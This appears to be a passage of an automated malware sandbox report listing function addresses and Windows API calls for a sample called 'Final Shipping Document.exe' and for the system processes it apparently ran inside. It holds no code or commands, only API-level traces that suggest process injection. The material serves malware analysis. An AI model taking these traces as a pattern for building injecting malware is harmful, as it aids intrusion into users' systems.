            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04F02BE0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04F02BA0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02B60 NtClose,LdrInitializeThunk,5_2_04F02B60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F035C0 NtCreateMutant,LdrInitializeThunk,5_2_04F035C0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F039B0 NtGetContextThread,LdrInitializeThunk,5_2_04F039B0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02CF0 NtOpenProcess,5_2_04F02CF0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02CC0 NtQueryVirtualMemory,5_2_04F02CC0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02C00 NtQueryInformationProcess,5_2_04F02C00
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02DB0 NtEnumerateKey,5_2_04F02DB0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02D00 NtSetInformationFile,5_2_04F02D00
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02EA0 NtAdjustPrivilegesToken,5_2_04F02EA0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02E30 NtWriteVirtualMemory,5_2_04F02E30
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02FA0 NtQuerySection,5_2_04F02FA0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02F90 NtProtectVirtualMemory,5_2_04F02F90
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02F60 NtCreateProcessEx,5_2_04F02F60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02AB0 NtWaitForSingleObject,5_2_04F02AB0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02B80 NtQueryInformationFile,5_2_04F02B80
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F03090 NtSetValueKey,5_2_04F03090
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F03010 NtOpenDirectoryObject,5_2_04F03010
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F03D70 NtOpenThread,5_2_04F03D70
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F03D10 NtOpenProcessToken,5_2_04F03D10
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02DA8A60 NtReadFile,5_2_02DA8A60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02DA8BF0 NtClose,5_2_02DA8BF0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02DA8B50 NtDeleteFile,5_2_02DA8B50
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02DA88F0 NtCreateFile,5_2_02DA88F0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02DA8D60 NtAllocateVirtualMemory,5_2_02DA8D60
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C0D5EB
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C01201
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C0E8F6
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C120460_2_00C12046
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA80600_2_00BA8060
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C082980_2_00C08298
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BDE4FF0_2_00BDE4FF
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BD676B0_2_00BD676B
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C348730_2_00C34873
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BCCAA00_2_00BCCAA0
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BACAF00_2_00BACAF0
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BBCC390_2_00BBCC39
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BD6DD90_2_00BD6DD9
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA91C00_2_00BA91C0
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BBB1190_2_00BBB119
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC13940_2_00BC1394
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC17060_2_00BC1706
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC781B0_2_00BC781B
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC19B00_2_00BC19B0
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA79200_2_00BA7920
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BB997D0_2_00BB997D
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC7A4A0_2_00BC7A4A
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC7CA70_2_00BC7CA7
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC1C770_2_00BC1C77
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BD9EEE0_2_00BD9EEE
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C2BE440_2_00C2BE44
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC1F320_2_00BC1F32
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_015736100_2_01573610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100332_2_00410033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E0B32_2_0040E0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031D02_2_004031D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AFC2_2_00416AFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B432_2_00416B43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B3E2_2_00416B3E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024A02_2_004024A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E6732_2_0042E673
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE0B2_2_0040FE0B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE132_2_0040FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA3522_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034003E62_2_034003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F02_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E02742_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C02C02_2_033C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA1182_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033301002_2_03330100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C81582_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F41A22_2_033F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034001AA2_2_034001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F81CC2_2_033F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D20002_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033407702_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033647502_2_03364750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C02_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C6E02_2_0335C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033405352_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034005912_2_03400591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E44202_2_033E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F24462_2_033F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EE4F62_2_033EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB402_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F6BD72_2_033F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA802_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033569622_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A02_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340A9A62_2_0340A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334A8402_2_0334A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033428402_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033268B82_2_033268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E8F02_2_0336E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360F302_2_03360F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E2F302_2_033E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03382F282_2_03382F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4F402_2_033B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BEFA02_2_033BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334CFE02_2_0334CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332FC82_2_03332FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEE262_2_033FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340E592_2_03340E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352E902_2_03352E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FCE932_2_033FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEEDB2_2_033FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DCD1F2_2_033DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334AD002_2_0334AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03358DBF2_2_03358DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333ADE02_2_0333ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340C002_2_03340C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0CB52_2_033E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330CF22_2_03330CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D2_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C2_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A2_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A02_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C02_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B16B2_2_0340B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F1722_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337516C2_2_0337516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334B1B02_2_0334B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F70E92_2_033F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF0E02_2_033FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF0CC2_2_033EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C02_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF7B02_2_033FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033856302_2_03385630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F16CC2_2_033F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F75712_2_033F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034095C32_2_034095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DD5B02_2_033DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF43F2_2_033FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033314602_2_03331460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFB762_2_033FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FB802_2_0335FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B5BF02_2_033B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337DBF92_2_0337DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B3A6C2_2_033B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFA492_2_033FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7A462_2_033F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DDAAC2_2_033DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03385AA02_2_03385AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E1AA32_2_033E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EDAC62_2_033EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D59102_2_033D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033499502_2_03349950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B9502_2_0335B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD8002_2_033AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033438E02_2_033438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFF092_2_033FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFFB12_2_033FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341F922_2_03341F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303FD22_2_03303FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303FD52_2_03303FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03349EB02_2_03349EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7D732_2_033F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F1D5A2_2_033F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343D402_2_03343D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FDC02_2_0335FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B9C322_2_033B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFCF22_2_033FFCF2
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034AA38F4_2_034AA38F
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034AA16F4_2_034AA16F
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034AA1674_2_034AA167
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034C89CF4_2_034C89CF
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034B0E584_2_034B0E58
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034B0E9A4_2_034B0E9A
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034B0E9F4_2_034B0E9F
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeCode function: 4_2_034A840F4_2_034A840F
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F7E4F65_2_04F7E4F6
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F824465_2_04F82446
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F744205_2_04F74420
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F905915_2_04F90591
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED05355_2_04ED0535
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EEC6E05_2_04EEC6E0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ECC7C05_2_04ECC7C0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED07705_2_04ED0770
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EF47505_2_04EF4750
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F620005_2_04F62000
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F881CC5_2_04F881CC
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F901AA5_2_04F901AA
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F841A25_2_04F841A2
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F581585_2_04F58158
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EC01005_2_04EC0100
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F6A1185_2_04F6A118
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F502C05_2_04F502C0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F702745_2_04F70274
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EDE3F05_2_04EDE3F0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F903E65_2_04F903E6
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8A3525_2_04F8A352
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EC0CF25_2_04EC0CF2
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F70CB55_2_04F70CB5
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED0C005_2_04ED0C00
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ECADE05_2_04ECADE0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EE8DBF5_2_04EE8DBF
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F6CD1F5_2_04F6CD1F
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EDAD005_2_04EDAD00
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8EEDB5_2_04F8EEDB
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8CE935_2_04F8CE93
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EE2E905_2_04EE2E90
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED0E595_2_04ED0E59
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8EE265_2_04F8EE26
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EDCFE05_2_04EDCFE0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EC2FC85_2_04EC2FC8
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F4EFA05_2_04F4EFA0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F44F405_2_04F44F40
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F72F305_2_04F72F30
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F12F285_2_04F12F28
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EF0F305_2_04EF0F30
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EFE8F05_2_04EFE8F0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EB68B85_2_04EB68B8
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED28405_2_04ED2840
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EDA8405_2_04EDA840
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED29A05_2_04ED29A0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F9A9A65_2_04F9A9A6
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EE69625_2_04EE6962
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ECEA805_2_04ECEA80
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F86BD75_2_04F86BD7
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8AB405_2_04F8AB40
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EC14605_2_04EC1460
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8F43F5_2_04F8F43F
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F995C35_2_04F995C3
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F6D5B05_2_04F6D5B0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F875715_2_04F87571
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F816CC5_2_04F816CC
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F156305_2_04F15630
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8F7B05_2_04F8F7B0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F870E95_2_04F870E9
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8F0E05_2_04F8F0E0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED70C05_2_04ED70C0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F7F0CC5_2_04F7F0CC
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EDB1B05_2_04EDB1B0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F9B16B5_2_04F9B16B
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EBF1725_2_04EBF172
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F0516C5_2_04F0516C
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F712ED5_2_04F712ED
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EEB2C05_2_04EEB2C0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED52A05_2_04ED52A0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F1739A5_2_04F1739A
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EBD34C5_2_04EBD34C
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8132D5_2_04F8132D
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8FCF25_2_04F8FCF2
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F49C325_2_04F49C32
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EEFDC05_2_04EEFDC0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F87D735_2_04F87D73
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F81D5A5_2_04F81D5A
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED3D405_2_04ED3D40
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED9EB05_2_04ED9EB0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8FFB15_2_04F8FFB1
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED1F925_2_04ED1F92
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8FF095_2_04F8FF09
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED38E05_2_04ED38E0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F3D8005_2_04F3D800
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED99505_2_04ED9950
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EEB9505_2_04EEB950
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F659105_2_04F65910
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F7DAC65_2_04F7DAC6
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F15AA05_2_04F15AA0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F71AA35_2_04F71AA3
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F6DAAC5_2_04F6DAAC
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F43A6C5_2_04F43A6C
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8FA495_2_04F8FA49
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F87A465_2_04F87A46
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F45BF05_2_04F45BF0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F0DBF95_2_04F0DBF9
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EEFB805_2_04EEFB80
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8FB765_2_04F8FB76
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D91A605_2_02D91A60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8CBE05_2_02D8CBE0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8C9C05_2_02D8C9C0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8C9B85_2_02D8C9B8
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8AC605_2_02D8AC60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02DAB2205_2_02DAB220
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D936F05_2_02D936F0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D936EB5_2_02D936EB
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D936A95_2_02D936A9
